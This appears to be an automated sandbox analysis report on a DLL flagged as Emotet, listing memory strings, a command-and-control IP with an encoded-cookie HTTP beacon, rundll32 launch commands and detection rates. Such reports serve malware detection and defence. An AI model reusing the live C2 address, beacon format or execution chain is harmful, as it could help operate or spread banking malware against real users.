Source: svchost.exe, 00000006.00000002.640848244.000001ECCBE5E000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.542568874.000000000466D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.544260152.000000000466F000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000003.718963355.0000000002BCE000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000002.764271676.0000000002BCE000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000003.717667638.0000000002BCE000.00000004.00000001.sdmp, svchost.exe, 00000026.00000002.763990473.00000184DC700000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WerFault.exe, 00000016.00000002.544098709.000000000292C000.00000004.00000020.sdmp | String found in binary or memory: http://crl.microsoft
Source: svchost.exe, 00000006.00000002.640739362.000001ECCBE15000.00000004.00000001.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000026.00000003.736509284.00000184DC77E000.00000004.00000001.sdmp, svchost.exe, 00000026.00000003.736795820.00000184DCC02000.00000004.00000001.sdmp | String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 00000006.00000003.639867231.000001ECC66A8000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.640572872.000001ECC66AB000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: Amcache.hve.19.dr | String found in binary or memory: http://upx.sf.net
Source: svchost.exe, 0000000A.00000002.442020760.0000017F2F613000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000007.00000002.761831217.000002067B43E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000007.00000002.761831217.000002067B43E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.xboxlive.com
Source: rundll32.exe, 00000019.00000002.763936612.0000000002B95000.00000004.00000020.sdmp | String found in binary or memory: https://45.63.5.129/
Source: rundll32.exe, 00000019.00000002.763540592.0000000002B5A000.00000004.00000020.sdmp | String found in binary or memory: https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDN
Source: rundll32.exe, 00000019.00000003.718992325.0000000002BAD000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000002.764113754.0000000002BAD000.00000004.00000001.sdmp | String found in binary or memory: https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDNG
Source: rundll32.exe, 00000019.00000002.763540592.0000000002B5A000.00000004.00000020.sdmp | String found in binary or memory: https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDNOz
Source: rundll32.exe, 00000019.00000003.718992325.0000000002BAD000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000002.764113754.0000000002BAD000.00000004.00000001.sdmp | String found in binary or memory: https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDNb
Source: svchost.exe, 00000007.00000002.761831217.000002067B43E000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000007.00000002.761831217.000002067B43E000.00000004.00000001.sdmp | String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000007.00000002.761831217.000002067B43E000.00000004.00000001.sdmp | String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000A.00000003.415890921.0000017F2F64D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000003.417063384.0000017F2F643000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.451867623.0000017F2F644000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417049148.0000017F2F642000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000003.417063384.0000017F2F643000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.451867623.0000017F2F644000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417049148.0000017F2F642000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000A.00000003.409525624.0000017F2F669000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.459029231.0000017F2F66B000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000002.442020760.0000017F2F613000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000003.417063384.0000017F2F643000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.451867623.0000017F2F644000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417049148.0000017F2F642000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000A.00000003.410767896.0000017F2F64F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.453634339.0000017F2F650000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Stops/
Source: svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000002.452763932.0000017F2F64A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417049148.0000017F2F642000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417035105.0000017F2F649000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
                      Source: svchost.exe, 00000026.00000003.736509284.00000184DC77E000.00000004.00000001.sdmp, svchost.exe, 00000026.00000003.736795820.00000184DCC02000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000000A.00000003.415890921.0000017F2F64D000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.417035105.0000017F2F649000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.452763932.0000017F2F64A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417035105.0000017F2F649000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.417044646.0000017F2F647000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.410767896.0000017F2F64F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.453634339.0000017F2F650000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.417063384.0000017F2F643000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.451867623.0000017F2F644000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417049148.0000017F2F642000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/roadshield.ashx?bucket=
                      Source: svchost.exe, 0000000A.00000002.451257545.0000017F2F641000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.450562403.0000017F2F63D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000A.00000003.417058867.0000017F2F63E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: svchost.exe, 00000026.00000003.736509284.00000184DC77E000.00000004.00000001.sdmp, svchost.exe, 00000026.00000003.736795820.00000184DCC02000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000026.00000003.736509284.00000184DC77E000.00000004.00000001.sdmp, svchost.exe, 00000026.00000003.736795820.00000184DCC02000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000026.00000003.739051194.00000184DC780000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/
                      Source: svchost.exe, 00000026.00000003.739051194.00000184DC780000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 25_2_02963394 InternetReadFile,
                      Source: global traffic HTTP traffic detected: GET /fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDN HTTP/1.1 Cookie: gKjP=1pPfMaoMdVUlKQUbAdiebE1XTzpT49WAqPCFzf9esRtAAep5qXcDMA3UcMnz2kDny2NkJZ+XzMNPrbuwewGy7ajRk6O8pCIMyS/tk7KPZ1sVOCZDzij8ol0kzhAKz+cyhczW5/Qg7WStsqckEM0Ai/TBhgYa4zLpY2xrkvKaCs5ZjXU46E7u7NfJ6u2+utMTe+1C5zhUB/BGEkeunoDpKbWBm9Kwrc3B7WoAGu/lbHZZe8hOoLZlL9MMnyWT3k4lhqZIOv4dj0Q= Host: 45.63.5.129 Connection: Keep-Alive Cache-Control: no-cache
                      Source: unknown HTTPS traffic detected: 45.63.5.129:443 -> 192.168.2.5:49804 version: TLS 1.2

                      E-Banking Fraud:

                      Yara detected Emotet

                      System Summary:

                      Source: 3pO1282Kpx.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2616 -ip 2616
                      Source: C:\Windows\SysWOW64\rundll32.exe File deleted: C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzg:Zone.Identifier
                      Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Qfdohhzjskeoxat\
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033F0370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DCF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DBD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033ED7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033F261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DCE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033ECE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D40E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033F1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033F20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297CE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02981291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297A29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296F48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029728D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02962CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029820CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029710CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02969824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02977445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296AE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296AA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296EE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02973782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02964B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029789A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297EDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02973D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297BF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296F73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02980370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296CF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02970E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02970A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296FE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297E899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296A083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029690D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02981CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029752D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029692C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029762F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02974CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029684F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029740FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029646FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02961EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029640E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296C0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029756E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0298261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297C205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02963432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02963228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297EA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02966453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296CE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02973043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297B677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296FA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296B464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02963A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02966869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02967795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02971591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296B191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297DB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02968D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297E3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029643BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029659BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297D7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029785B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297E5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297DDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02970BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029675D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029619C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296A3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029651EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296CB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02964D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297E10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297CD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02979124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296A92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02976540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296BD61
                      Source: C:\Windows\System32\loaddll32.exe :: Code function: String function: 6EE8AC90 appears 33 times
                      Source: C:\Windows\System32\loaddll32.exe :: Code function: String function: 6EE71DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Code function: String function: 6EE8AC90 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Code function: String function: 6EE71DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exe :: Process Stats: CPU usage > 98%
                      Source: C:\Windows\System32\svchost.exe :: Section loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exe :: Section loaded: cdpsgshims.dll
                      Source: 3pO1282Kpx.dll :: Virustotal: Detection: 23%
                      Source: 3pO1282Kpx.dll :: ReversingLabs: Detection: 17%
                      Source: 3pO1282Kpx.dll :: Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe :: Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown :: Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll"
                      Source: C:\Windows\System32\loaddll32.exe :: Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,ajkaibu
